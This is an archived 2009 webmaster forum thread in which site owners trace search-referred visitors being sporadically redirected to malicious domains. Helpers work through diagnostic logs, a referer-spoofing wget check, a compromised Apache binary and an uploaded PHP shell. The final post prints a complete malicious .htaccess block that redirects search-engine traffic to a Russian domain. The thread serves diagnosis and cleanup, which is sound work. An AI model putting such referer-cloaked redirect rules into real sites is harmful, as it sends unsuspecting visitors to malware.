Categories: Malware & hacked sites :

URL hijack?

Showing 1-65 of 65 messages
URL hijack? wredefine 1/29/09 1:58 PM
I'm helping a small business with their website and recently they have had a problem where users periodically experience a URL hijack when trying to reach the site from a Google search.  I have been able to reproduce the problem only once, and all of the checks in Google's webmaster tools come back as good.  The site is www.yogahome.net and the hijack URL is "http://220.196.59.23/index2.php?src=518&surl=www.yogahome.net&sport=80&suri=%2F".  Googling the IP yields some interesting results including this result from Norton: https://safeweb.norton.com/report/show?name=220.196.59.23

Any idea how to recover from this and get Google to remove the hijack link from their index?

Thanks in advance,
Johann2009-01-29

I just had the URL hijack happen to me again - this time I captured a little more information.  I Googled "yoga cincinnati" and yogahome.net was the 5th result in the list.  When I clicked the link, I was taken to:
http://msvcp50.biz/index2.php?src=518&surl=www.yogahome.net&sport=80&suri=%2F

I clicked back to return to the result list, and copied the Google link URL, which was:

http://www.google.com/url?sa=t&source=web&ct=res&cd=15&url=http%3A%2F%2Fwww.yogahome.net%2F&ei=miyCSbG-H9eitgfB-eQk&usg=AFQjCNEUDkjqjDRNy1PF-KCac_ha4tRl9w&sig2=cHoQXcPFIktKPscjlaMkbw

instead of what it should have been: http://www.yogahome.net.  The rest of the links in the results list looked normal, in other words the link matched the green URL text below the site description.

Re: URL hijack? John 1/29/09 2:18 PM
I don't see that IP indexed with your domain any more:
http://www.google.com/search?num=100&hl=en&safe=off&q=site%3A220.196.59.23&btnG=Search

Plus your site is listed as being fine:
http://www.google.com/safebrowsing/diagnostic?site=yogahome.net
Re: URL hijack? Kaleh 1/29/09 3:40 PM
You definitely seem to have a redirect going on there, even though the Safebrowsing report hasn't flagged anything as malicious. 

When I attempted to access the site from the search results using FireFox3 with NoScript, the URL in the address bar changed to:

http: // msvcp50. biz/index2.php?src=518&surl= www. yogahome. net&sport=80&suri=%2F

NoScript didn't allow the page to load and I had the following in the upper left corner of my screen:

http: // ultimatecleaner. biz/hitin.php?land=20&affid=02913

I don't know how this helps you, but to confirm a redirect. 
Re: URL hijack? wredefine 1/29/09 3:54 PM
I think I have found my own answer.  I ran HTTP Watch on the dialog between my browser and the server, and I discovered that it is in fact my server that is issuing the redirect.  I happened to find this blog post: http://www.askdavetaylor.com/how_people_hack_apache_web_server_rewrite_rules.html that describes exactly my situation.  I'm opening a ticket with my hosting provider to check this out since I don't have access to the httpd.conf file, but I'm pretty sure that this is the source of my problem.

Thanks John and Kaleh for your replies!
Re: URL hijack? Kaleh 1/29/09 3:55 PM
I just tried accessing a second time and this time I go straight to the site. 

I have seen hacked sites before behave this way before.  The redirect would occur sometimes, but not all the time.  I've read about some of them that occur randomly and some of them that record your IP address and don't allow it to happen a second time.  There was one I personally ran into into a while back where I was able to get the redirect to occur again after I released and renewed my IP address.

My recollection were that those redirects were being caused by entries in the .htaccess file(s) although I'm suppose there could be other methods as well. 
Re: URL hijack? vivian416 2/2/09 3:24 PM
I am experiencing the same thing with two of my websites. I have come across this forum and tried contacting my hostng provider. The hosting provider wasn't able to help me at all.

I have never been hacked before. As all of us are saying, the redirects would happen sporadically. Mine behaves the same way.

My solution so far seem to just remove the .htaccess file all together. It seems to work so far.
Re: URL hijack? vivian416 2/2/09 3:31 PM
I thought it worked but it didn't.

Here's my link that was hijacked.
http://msvcp50.biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2F

Any suggestions will welcome.

Thanks
Re: URL hijack? wredefine 2/3/09 9:00 AM
Hi Vivian.  When you say that your hosting provider wasn't able to help you, what did you ask them to do?  Take a look at this link: http://www.askdavetaylor.com/how_people_hack_apache_web_server_rewrite_rules.html_ and then ask them specifically to check the HTTPD.CONF file for redirects.  My infrastructure provider was adamant that this was a 302 exploit (http://clsc.net/research/google-302-page-hijack.htm) but that doesn't hold water for a number of reasons.  My colleagues and I checked all of the sites that we had hosted on the same server using HTTPWatch (http://www.httpwatch.com/) and every one of them showed a server redirect being issued by Apache prior to any sort of page load, which points to the HTTPD.CONF file.  

Our infrastructure provider's solution is to move the sites to another server, wich has yielded positive results.  We have since purchased our own dedicated server so that we have a greater degree of control over the sites we host.  If your provider refuses to do this you may want to consider changing hosting providers.
Re: URL hijack? vivian416 2/3/09 11:55 AM
Thanks for your response. I asked my provider to check for the server for redirects then I got a response saying that I should contact Google or Yahoo for this issue. And I followed your advice to ask them to check against HTTPD.CONF for redirects. Now I am waiting for them to respond. I read, "http://www.askdavetaylor.com/how_people_hack_apache_web_server_rewrite_rules.html" as suggested; however, I don't believe I can run "grep" on windows, can't I?  Thank so  much for suggesting HTTPwatch. I am going to go ahead and see what I find.

I appreciate your response more than you know. I hope I get this resolved soon.

Thank you.
Re: URL hijack? vivian416 2/3/09 12:12 PM
I just got a response from the hosting provider. Here's what they say.

"I'm not seeing anything specific in the httpd.conf. If you are only having this happen through a search engine than it is possible that the search engine's cache is still corrupted and needs cleared."

I am bummed and confused now. Really have no clue what else I could do.
Re: URL hijack? vivian416 2/3/09 12:16 PM
Here are the summary from HTTPwatch. It almost looks it is issuing this requested against archive.org:?


+ 0.000                0.140        1105        583        GET        302        Redirect to http://www.freedebtconsultations.com/        http://rds.yahoo.com/_ylt=A0oGkkL6oohJPNUAL5hXNyoA;_ylu=X3oDMTByN2s4bDgzBHNlYwNzcgRwb3MDNARjb2xvA3NrMQR2dGlkAw--/SIG=11pisn0sd/EXP=1233777786/**http%3a//www.freedebtconsultations.com/

+ 0.142                0.296        501        907        GET        302        Redirect to http://msvcp50.biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2Findex%2Ephp        http://www.freedebtconsultations.com/
+ 0.441                0.032        0        0        GET        NS_ERROR_MALWARE_URI        *        http://msvcp50.biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2Findex%2Ephp
                0.474        1606        1490        3 requests                        
 00:00:00.624                0.319        856        176        GET        200        text/html; charset=UTF-8        http://toolbarqueries.google.com/search?client=navclient-auto&hl=en&ch=62553303521&ie=UTF-8&oe=UTF-8&features=Rank&q=info:http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp
 00:00:00.627                0.194        681        4377        GET        200        text/html; charset=UTF-8        http://www.google.com/search?hl=en&safe=off&q=site%3Amsvcp50.biz&btnG=Search
 00:00:00.629                0.723        1119        2631        GET        200        text/html; charset=UTF-8        http://siteexplorer.search.yahoo.com/advsearch?p=http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp&bwm=i&bwmo=d&bwmf=u
 00:00:00.632                0.284        1014        2535        GET        200        text/html; charset=UTF-8        http://siteexplorer.search.yahoo.com/advsearch?p=http%3A%2F%2Fmsvcp50.biz&bwm=i&bwmo=d&bwmf=s
 00:00:00.633                0.335        928        3683        GET        200        text/xml; charset=utf-8        http://search.msn.com/results.aspx?q=site%3Amsvcp50.biz&FORM=QBRE&format=xml
 00:00:00.636                0.420        509        261        GET        200        text/xml        http://xml.alexa.com/data?cli=10&dat=nsa&ver=quirk-searchstatus&uid=20080702094411&userip=192.168.1.5&url=msvcp50.biz
 00:00:00.638                1.807        416        2321        GET        403        text/html        http://web.archive.org/web/*/http://msvcp50.biz
 00:00:00.640                0.344        566        960        GET        301        Redirect to http://delicious.com/url/check?url=http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp&submit=check%20url&settagview=list        http://del.icio.us/url/check?url=http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp&submit=check%20url&settagview=list
 00:00:00.642                0.084        0        0        GET        (Cache)        text/plain        http://msvcp50.biz/robots.txt
 00:00:00.644                0.667        399        347        GET        404        text/html        http://msvcp50.biz/sitemap.xml
 00:00:00.984                0.296        1117        1188        GET        302        Redirect to http://delicious.com/url/a06c00eec4644a869de4857eb5103e43        http://delicious.com/url/check?url=http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp&submit=check%20url&settagview=list
 00:00:01.282                0.321        933        4160        GET        200        text/html; charset=UTF-8        http://delicious.com/url/a06c00eec4644a869de4857eb5103e43
Re: URL hijack? JohnMu 2/3/09 3:02 PM
Hi vivian416 and welcome to the forum!

About one time out of three when accessing your site with a Google referrer I get redirected to that site. I'm pretty sure that it's either something in the Apache settings or with the code on your own site (eg. if you have the hack in a CMS that you are using). I would definitely follow up on this to get it resolved.

Here's how I looked at it (without using a browser, you never know with the malware out there; the actual command is bolded):

C:\temp>wget -U Mozilla --referer http://www.google.com/search?q=something http://www.freedebtconsultations.com/
--23:56:49--  http://www.freedebtconsultations.com/
           => `index.html.12'
Resolving www.freedebtconsultations.com... 66.225.219.162
Connecting to www.freedebtconsultations.com|66.225.219.162|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://msvcp50. biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2F [following]
--23:56:50--  http://msvcp50. biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2F
           => `index2.php@src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2F'
Resolving msvcp50. biz... 220.196.59.23
Connecting to msvcp50. biz|220.196.59.23|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.freedebtconsultations.com/ [following]
--23:56:51--  http://www.freedebtconsultations.com/
           => `index.html.12'
Connecting to www.freedebtconsultations.com|66.225.219.162|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

You can see that the server is redirecting to the bad site, but that one is redirecting back (perhaps because it's already seen my IP address?). At any rate, this is not a good thing and needs to be resolved as quickly as possible!

Hope it helps!
John

PS Here's a similar hack: http://johnmu.com/hack-hidden-redirect/ -- the URL redirected to looks too familiar...
Re: URL hijack? vivian416 2/3/09 3:13 PM
I am trying everything to get this resolved and I am getting no results. My hosting provider is telling me they don't see anything from the Apache server.

As you suggested, you said it coud be a hack in CMS that I am using. How do I find that out?

Will it help if my websites migrate to another server?

Thanks so much for your response.

I am in need of desparate help.
Re: URL hijack? JohnMu 2/3/09 3:36 PM
Hi Vivian416
A simple way to check to see if the hack is in your CMS or not is to rename the "index.php" file (which most CMS have) to something else. This will/should break your site, but if you still see the redirect, then it has to be something somewhere else. If you have access to the .htaccess file, you can try the same there. I would not delete these files, just renaming them to something else is sufficient.

Good luck!
John
Re: URL hijack? vivian416 2/3/09 4:14 PM
No luck and I will keep trying. This is exhausting.

Thanks so much for all your help. I appreciate your suggestions and replies more than you know.

Vivian :(
Re: URL hijack? rudyh 2/4/09 5:59 AM
Hi Vivian,
You're not alone.... Exactly the same trick appears to happen with my website www.maitreya.nl; a one-time redirect when you come from Google. He checked with NOD32 Smart Security, and that appears to detect a Trojan...
The really bad news is that when I asked the webhost about this, they offered to completely rebuild the Apache server, but after that, the problem remained - a catch 22? Also the .htaccess files appear to have nothing to do with it. I don't use CMS on that website.

Love & clear light,
Rudy
Re: URL hijack? rudyh 2/4/09 6:05 AM
I forgot to say that when using different IP addresses, it only happens once per IP. Very intelligent & scary. By the way, it also redirects to the same website http://msvcp50. biz - with owners in China.
Re: URL hijack? vivian416 2/4/09 9:42 AM
Thanks Rudy for your input. This is very scary. I still haven't got this resolved. The hosting provider checked against the HTTPD.CONF file for redirects but they couldn't find anything. And thank you for providing that you are not using CMS also, As "JohnMu" mentioned that could be the case.

Mine seems to be the same case as yours in which .htaccess files appear to have nothing to do with it.

*sigh*
Re: URL hijack? wredefine 2/4/09 10:27 PM
My infrastructure provider didn't find anything in the HTTPD.CONF either.  However, I think I may have discovered the solution.

Basically, if you add a redirect of your own it looks like it overrides the malicious redirect and when you remove it, it clears the problem.  To do this via CPANEL, locate the "Redirects" (in the "Site Management" area).  Check that there are no redirects there and add one of your own.  The redirect will depend on what technology your site uses.  If it's HTML, then the redirect would look like: http://yoursite.com >> http://www.yoursite.com/index.html.  I recommend running HTTPWatch once before you do this to confirm that you are being re-directed, then apply the redirect, access the site again via the search engine with HTTPWatch on.  You should no longer see the redirect.  Go back into CPANEL and delete the redirect.  Again, access the site via the search engine and HTTPWatch to verify that the malicious redirect is completely gone.
Re: URL hijack? vivian416 2/4/09 11:05 PM
Wow...Thanks so much for this suggestion or perhaps a solution. This information is really helpful. Although I tried something similar as you suggested and it didn't work. However, it was interesting of what you said because I never thought of it as being overridden.

I will definitely try your method again tomorrow.

My case seems to be closest to yours as we both were redirected to the same domain name. It has been taking me days trying to figure this nightmare out.

My hosting provider has no clue whatsoever. They are in the process of migrating one of my websites to another server(As hinted by you). I'll see if that will solve the problem. That was a panic move as I don't want to lose my ranking on google and the site being continuously infected by malware.

I really appreciate your help and input. I mean that sincerely.


Vivian
Re: URL hijack? rudyh 2/5/09 4:30 AM
More bad news, the http://msvcp50. biz is now listed at safeweb.norton.com/report/show?name=msvcp50.biz , which lists no less then 7 threats...
Re: URL hijack? rudyh 2/5/09 6:28 AM
OK, some good news: the trick of wredefine appears to work: so, set a temporary redirect at the webserver of your domain name and delete the redirect again, I checked a couple of people and the malicious redirect seems gone!
Re: URL hijack? rudyh 2/5/09 1:39 PM
Sorry, I cheered too quick. It seems to be happening again...
Re: URL hijack? wredefine 2/5/09 2:26 PM
It seems that I also spoke too soon.  The trick I employed worked when I checked it with Firefox using HttpFox (the Firefox equivalent of HTTPWatch) last night.  Since I run Ubuntu Linux as my main OS, I didn't bother to fire up a Windows PC to try it in IE.  When I tried it this morning, it turns out that the problem is still there in IE, even though it's gone in Firefox.  :(

I do believe that whatever is causing the redirect is happening before the server processes the .HTACCESS file.  I set a global redirect to yahoo.com there and watched as I went from the Google search result to my site, then to msvcp50.biz and then to yahoo.com.

I wish I was smarter...
Re: URL hijack? rudyh 2/6/09 10:57 AM
One more hint: we do need to clear the browser cache before checking if it still happens after we made a possible fix. I kept forgetting that, so there is a small chance that the Apache & PHP rebuild on my server has actually done the job. I'll keep you informed.
Re: URL hijack? rudyh 2/7/09 3:28 AM
Well, clearing the cache didn't do it.
In the man time, the people from the webhost are unable to even reproduce the redirect... What's the phone number of ghostbusters?
Re: URL hijack? Kaleh 2/7/09 4:24 AM
As I was reviewing my notes from various discussions about where the problem sometimes is found, I ran across one referencing the .htaccess file above the public_html.  I have absolutely no idea how feasible it is, but it may be another thing to check into.

This is a discussion from Badwarebusters.org where this is discussed.

http://badwarebusters.org/main/itemview/597
Re: URL hijack? rudyh 2/7/09 1:57 PM
Thanks Kaleh, but at least in my case, the .htaccess file is not affected. I fear that something quite advanced is used here....
Re: URL hijack? webado 2/7/09 2:43 PM
Please check the .htaccess file very carefully. Sometimes lots of blank lines are added at the bottom and only after miles of blank lines will you see the strange code.
 
Also there can be .htaccess files in any folder on the site.
 
And check the home directory because an .htaccess file there will affect the entire site.
 
Currently I am seeing the Apache green page at http://www.freedebtconsultations.com/ , so you no longer have a site it seems. Maybe your hoster is doing something with the dns.
 
Great Success !
Apache is working on your cPanel® and WHM™ Server
 
 
 
Re: URL hijack? webado 2/7/09 2:45 PM
It could of course be any php script that's used on the site that does the redirection.
Re: URL hijack? rudyh 2/7/09 4:22 PM
True, but my website doesn't have any php...
Also, the redirect happens before you see the website, so the php should come before the index file, which I think is impossible?
The .htaccess file is definitely clean; good hint though, lots of empty lines would be easy to miss!
Re: URL hijack? webado 2/7/09 5:00 PM
I don't know what you are using on your site. Especially now that the site is no longer showing up at all, except as the generic homepage of an Apache server.
 
But php for sure you are or were using:
 
Se all the pages suffixed as php?
 
I mentioned all the spots where it could have originated assuming it was not javscript. It would not have been javascript since JohnMu saw it in action with javascript not being involved.
Re: URL hijack? webado 2/7/09 5:09 PM
Oh of course you rudyh are not the same person whose site we were last discussing.
 
This  is what happens when people jump in with their own problems. We lose track.
 
You got the doctype after the <html> tag. It should be before.
 
Not seeing your site flagged for malware in a site: query. Nor in Google's safebrowsing diagnostic page.
Re: URL hijack? webado 2/7/09 5:18 PM
Hah, I did get the redirection and all the blasted  malware and the whole shooting match!
 
Yes, it's at your server level, no doubt about it.  I clicked the link to verklarende-woordenlijst.htm from a Google site query.
 
 
I see it has Frontpage extensions - if they are enabled for your account get rid of them and delete all the associated folders (_vti ... ).
 
It's either your site that's been hacked or the entire server. Do talk to your hoster and don't stop until they've dissected everything.
 
 
 
Re: URL hijack? rudyh 2/7/09 5:58 PM
Frontpage extensions are not enabled. :(
In the mean time, the helpful team of the host have already upgraded and rebuilt Apache and PHP on the server, and they cannot find anything suspicious in any of the files.
They even have the problem to get the redirect themselves, so they are gradually getting just as lost as I am...
Re: URL hijack? webado 2/7/09 7:25 PM
Well then their problem is deep rooted.
 
If after rebuilding Apache and php the hack is still there this is most mysterious.
Re: URL hijack? vivian416 2/10/09 12:03 PM
wredefine, there's a twist to my situation.

I had one of my websites migrated to a new server and that so far has yielded positive results. Then I went ahead and did the same thing with my reseller account which hosts multiple websites. But that didn't work. The redirects still exist but only with some of the websites.

Now I am more confused than I have ever been because these are all mixed results.
Re: URL hijack? webado 2/10/09 12:12 PM
If the subaccounts were migrated as is then they got migrated with the hacks as well.
Re: URL hijack? vivian416 2/10/09 12:32 PM
This is more of a question of my lack of knowledge of the subject than questioning you.

If these redirects are issued on the server level then how could the hacks be migrated as well?
Re: URL hijack? webado 2/10/09 12:40 PM
Some subaccounts may have been hacked at their level rather than higher up at the server level. Perhaps that was possoble due to a vulnerability at the server level.
 
You need to comb through each one.
 
 
 
 
 
 
Re: URL hijack? webado 2/10/09 12:44 PM
For instance if an .htaccess fie in a subaccount was hacked, or any scripts, migrating the subaccount by copying it,  will bring along its hacked .htaccess file or scripts as well.
Re: URL hijack? vivian416 2/10/09 12:49 PM
Thank you for such quick responses. Oh...I see what you are saying; however, in my case it has nothing to do with .htaccess files in a first place. But do you have any suggestion as to where I should be looking for the hack? Where would these hacks be possibly hiding?
Re: URL hijack? webado 2/10/09 12:56 PM
Any php scripts may have been corrupted.
Even in the database you may have tainted data.
 
 
What kind of software do you have on those sites? blog? cms? ecommerce? Which ones?
 
 
 
Re: URL hijack? vivian416 2/10/09 1:03 PM
I don't have any software that you have mentioned on my websites.

But I will look into very hard as you mentioned....really comb through each and every one of them.
Re: URL hijack? vivian416 2/11/09 7:45 PM
Now I am almost certain it has everything to do with the server level. I am not sure I know the subject enough to make this assumption perhaps someone may be able to tell me if that's true. And if yes, should I just change my hosting provider?

I just removed the entire content of the website. It's a completely empty directory. And now I get redirect to the hacked page EVERYTIME instead of every other time. Perhaps if someone read this they can try and see if they get the same result

Go to yahoo and type "debt group" --> 4th result ---> my website is freedebtconsulations.com
Re: URL hijack? webado 2/11/09 8:43 PM
Certainly looks like that.
 
Please look for an .htaccess file somewhere. It's a hidden file so you have to turn on viewing hidden files.
Re: URL hijack? rudyh 2/12/09 2:10 AM
My .htaccess files are clean.... :-(
I'm following the redirects now with httpwatch (a free program), and it seems that at random, I get 3 types of results when I visit pages via the links in Google or Yahoo;
1. No redirect - as it should be
2. A full redirect, where you end up at the malicious website (usually only once per day per IP address)
3. A redirect, but still going to my website - visible with httpwatch, but then a redirect again, back to my own website: a normal visitor would not notice anything (!)
4. Series of redirects: first to my site maitreya.nl, then to msvcp50.biz, then to maitreya.nl again, then to msvcp50.biz again, and usually ending at maitreya.nl, so somehow the redirect software seems to trigger itself again.
Re: URL hijack? webado 2/12/09 5:31 AM
Rudyh, it has to be somewhere. It's not by magic.
 
Your site does not work at all without www.
 
Error fetching url.
 
 
So your dns zone is set up incorrectly as well.
 
There's a chance I suppose that it's your nameservers that have been hacked and the redirectiosn happens from there.
 
Check with your hoster if you have not found any .htaccess file nor any php script on your site that are responsible for the redirections.
 
 
 
 
 
 
Re: URL hijack? rudyh 2/13/09 2:04 AM
The problem seems to be solved, I finally got rid of the malicious redirects. After several trials, the webhost replaced the "Apache binary" with a new fresh one, and that did it!

The strange problem with the DNS (http://maitreya.nl gives a 404, not found, so it needs the www. in front) is not solved yet, this only began  yesterday, and only happens in IE; Firefox simply does find the page...
Thank you, webado for pointing this out to me!
Re: URL hijack? webado 2/13/09 5:48 AM
It is not responding with a 404 either. Just nothing.   When accssing with IE the response is:

Oops! This link appears broken.

DNS error - cannot find server.

 

When accessing in Firefox it seems to redirect somehow to http://www.maitreya.nl/ but I dont' knwo how it does it. I have a new Firfox version, and it seems to go through Google's cache and then conclude it shoud lshow the www version.

 
However the response for http://maitreya.nl/ should be either a clear  200 or a clear 301 redirection to http://www.maitreya.nl/
 
If you response had been a 200 I would have advised you then 301 redirect it to http://www.maitreya.nl/ using the .htaccess file in order to consolidate the site under one canonical form.
 
 
Re: URL hijack? wredefine 2/13/09 6:02 AM
Vivian - this may sound like a dumb question, but did your reseller account go to the same server as the single website you mentioned as being fixed?
Rudy - wow, a hacked Apache bin file?  That's pretty scary.  If that's the culprit, all the .htaccess and httpd.conf files in the world won't matter.
Webado - thanks for jumping in and lending your expertise!
Re: URL hijack? rudyh 2/13/09 6:42 AM
You are right webado, actually it is not a 404, it just says: "Internet Explorer cannot display the webpage".
When I use Firefox and httpwatch, it first says   "NS_ERROR_UNKNOWN_HOST", next it simply uses the cache, or (when th cache is cleared)  it reads "1 request" (no details, and it takes no time) and as third it simply goes to www.maitreya.nl.
IE also lists the 'request' as second step, but then doesn't go anywhere...  So the problem certainly seems to be with the DNS. I'll look into that, many thanks again.
Re: URL hijack? webado 2/13/09 6:53 AM
>> Rudy - wow, a hacked Apache bin file?  That's pretty scary.  If that's the culprit, all the .htaccess and httpd.conf files in the world won't matter
 
Absolutely. A totally hacked server, a hacker's delight. May they all roast in hell! :(
 
Maybe we can assume that all cases of redirection to that aprticualr nasty site are due to a hacked Apache binary? Scary indeed, but what's scarier is that convincing the server admins of that will be a job and a half.
 
 
 
Re: URL hijack? rudyh 2/13/09 7:36 AM
The response of the very helpful server admin was a bit vague, yes. He said "The problem with the binary had nothing to do with your account or your accounts security, but rather a flaw in the actual binary, which should be fixed now."
Well, I sure hope so...  ;-)
Re: URL hijack? webado 2/13/09 7:54 AM
Oh really? And just by miracle that also cured the redirection? or did it?
 
Well server admins the world over are usually reluctant to admit that maybe there is or was a real problem somewhere.
Re: URL hijack? rudyh 2/13/09 8:43 AM
Well yes, in as far as that I have not seen any redirections since.
They did take 3 days and serveral trials and errors until this one worked though. Anyways, I would not even know what the Apache binary is - I am happy to leave that to the specialists. ;-)
Re: URL hijack? webado 2/13/09 8:55 AM
The Aapche binary? It's all of the programs and fiels involved in the Apache server.
 
If you have ever installed Aapche on your pc (e.g. XAMPP from http://www.apachefriends.org/en/xampp.html) to test your website on you own pc, you will see a folder called bin under the main Apache folder, and it's loaded with all sorts of files that make up Apache.
 
Your web server is set up much in the same way, with whatever version of Apache they are using. The difference is that on yrou pc you'd get Apache tu run in Windows, whereas on the actual server Apache runs in some version of Unix or Linux, with a lot more bells and whistles for sure.
Re: URL hijack? vivian416 2/13/09 9:16 AM
@wredefine

"Vivian - this may sound like a dumb question, but did your reseller account go to the same server as the single website you mentioned as being fixed?"
No. The reseller account went to a different server. What was more scary is after they migrated my reseller account to a different server the redirection was still there. So for about 2 weeks the hosting provider was convinced it was on our end that was causing the problem. And I was getting suspicious myself perhaps the problem was on our end also.

Then, I deleted the entire content of one of the websites just to see if it would behave differently. The redirection was still there and it would redirect to the hacked site everytime instead of once every 3 times. The hosting provider finally convinced and helped. Solution: They rewrote the new httpd binary and restarted Apache!

This whole fiasco was very scary. I am shell shocked now. As of now problems seemed to be fixed.

Thanks wredefine and  everyone for trying to help.
Re: URL hijack? webado 2/13/09 9:27 AM
Good to hear that.
 
So we can assume it's the same hackers at work - or else you are coincidentally both hosted on the same server or server network.
Re: URL hijack? rudyh 2/13/09 10:11 AM
Good point webado! I am with HostforWeb, the Reno server. And you Vivian?
Re: URL hijack? vivian416 2/13/09 10:36 AM
Yes. I am on with Hostforweb also! My goodness.
Re: URL hijack? webado 2/13/09 11:11 AM
Hmmm.. at least it's not all over god's green acres. With luck (too late for you, you've already been stung, but for others) it may be contained on that network - hopefully eradicated by now.
 
Good luck from now on.
 
 
Re: URL hijack? rudyh 2/13/09 11:11 AM
Amazing, the world is a small place... The internet makes it the size of a computer-screen, not just with Google Maps :-)
Re: URL hijack? etheis 1/15/10 4:01 PM
Thank God for this page... I found it because my domains were being redirected from google links to the
same type of url, just a different domain:
http://hnwmwpy6   .in/index.php?src=199&surl=www.[DOMAIN].com&sport=80&suri=%2F
which gives a fake windows registry error with a download to what can only be spyware.
Only when I searched google for "&sport=80" luckily this page come up and it all sounded
too familiar.

Another clever thing these hackers are doing is if you revisit that above URL directly for a 2nd time, you are told
the host has closed down the account -- as you are led to beleive it was shut down -- but I
thought to myself -- now what are the chances they shut it down right this second.

So after I checked my server conf files and .htaccess files (all clean) I knew it must be at the apache binary level.
I sent this thread to my dedicated server host and they said "I've rebuild everything on the server including the kernel/world.  I've got a copy of the apache binary and a module that was also affected (I checked the MD5s) and they were indeed altered somehow.  The timestamps were not modified so I'll be going through the server logs to see if I can determine when and how this happened."

After running a Clam scan we found the following:
/usr/home/httpd/clients/[DOMAIN]/public_html/store/images/khgujp.php: PHP.Shell
FOUND

That file had 777 permissions and www ownership. It turns out that this
site using Zen-Cart 1.3.7  was exploited, they got into the admin panel for it and
where able to upload that phpfile as a product image and change permissions on
it.

So make sure you do a full scan of your filesystem and lookout for an exploit like this.

Another thing, I had this last month a few users of my site report that randomly a link
they clicked on while at my site led them to a malicious site. I had up till now excluded
it from being my server (injection attack etc) and assumed they must just have adware/malware
themselves that only triggers once in a blue moon. Anyone else experience redirects like this
in addition to google referred redirects?
Re: URL hijack? Driscoll 1/18/10 8:46 AM
Thanks for all the Help. I was sure google was hacked as only search was hijacked not direct eneterd URL.
meaning they didn't re-direct my DNS only the searchs... They did it with a .htaccess[1] file in my web site's root.
contents was...
#  HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ http://earth-stat.ru/ [R=301,L]

ErrorDocument 401 http://earth-stat.ru/
ErrorDocument 403 http://earth-stat.ru/
ErrorDocument 404 http://earth-stat.ru/
ErrorDocument 500 http://earth-stat.ru/
#  /HostRule
More topics »